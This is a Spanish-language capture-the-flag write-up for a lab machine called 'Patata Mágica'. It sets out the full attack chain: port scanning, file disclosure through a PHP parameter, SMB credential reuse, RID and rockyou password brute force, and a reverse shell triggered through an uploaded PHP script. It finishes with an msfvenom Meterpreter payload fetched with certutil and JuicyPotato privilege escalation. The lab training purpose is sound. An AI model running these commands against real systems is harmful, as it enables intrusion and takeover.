Write-ups

Resolución del CTF – Patata Mágica


Enumeración

Escaneo de puertos

Realizamos un escaneo de todos los puertos para identificar los servicios activos en el sistema objetivo.

nmap -p- --open -sCV -Pn -n --min-rate 5000 192.168.0.101
  • -p- : Escaneo de todos los puertos. (65535)
  • -sS : Realiza un TCP SYN Scan para escanear rápidamente qué puertos están abiertos.
  • -sC : Escaneo con scripts básicos de reconocimiento.
  • -sV : Detección de servicios.
  • –min-rate 5000 : Escaneo no inferior a 5000 paquetes/segundo.
  • -n : Sin resolución DNS.
  • -Pn : Sin descubrimiento por ping.

Enumeración web

Identificamos un servicio web en el puerto 80 con funcionalidad de lectura de archivos mediante parámetro GET.

curl 'http://192.168.0.101/juegos.php?file=index.php'

En el código fuente obtenemos credenciales válidas para autenticación SMB.

Acceso SMB inicial

Verificamos las credenciales obtenidas contra el servicio SMB.

netexec smb 192.168.0.101 -u patata -p 00000

Enumeramos los recursos compartidos accesibles.

smbmap -H 192.168.0.101 -u patata -p 00000

Accedemos al recurso Secreto y descargamos su contenido.

smbclient //192.168.0.101/Secreto -U patata

Enumeración de usuarios SMB

Enumeramos usuarios del sistema mediante RID brute force.

netexec smb 192.168.0.101 -u patata -p 00000 --rid-brute

Identificamos el usuario Hacker y realizamos un ataque de fuerza bruta para obtener su contraseña.

netexec smb 192.168.0.101 -u Hacker -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding

Acceso SMB como Hacker

Autenticamos con las nuevas credenciales y enumeramos recursos.

smbmap -H 192.168.0.101 -u hacker -p clifford

Accedemos al recurso Figuras y descargamos los archivos disponibles.

smbclient //192.168.0.101/Figuras -U hacker

Explotación LFI y ejecución remota

Enumeramos el servidor web y localizamos un directorio de subida con indicios de LFI.

feroxbuster -u http://192.168.0.101/ -x php

Identificamos un script de reverse shell accesible y lo ejecutamos indicando nuestra IP y puerto.

nc -lvnp 4444
curl 'http://192.168.0.101/uploads/revershell.php?ip=192.168.0.102&port=4444'

Escalada de privilegios

Verificamos privilegios del usuario comprometido y confirmamos SeImpersonatePrivilege habilitado.

whoami /all

Generamos un payload Meterpreter y lo transferimos al sistema objetivo.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=5555 -f exe -o evil.exe
python3 -m http.server 80
certutil -urlcache -split -f http://192.168.0.102/evil.exe evil.exe

Ejecutamos el binario y utilizamos un módulo Potato para obtener ejecución como administrador.

use exploit/windows/local/juicypotato
set SESSION 1
run

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *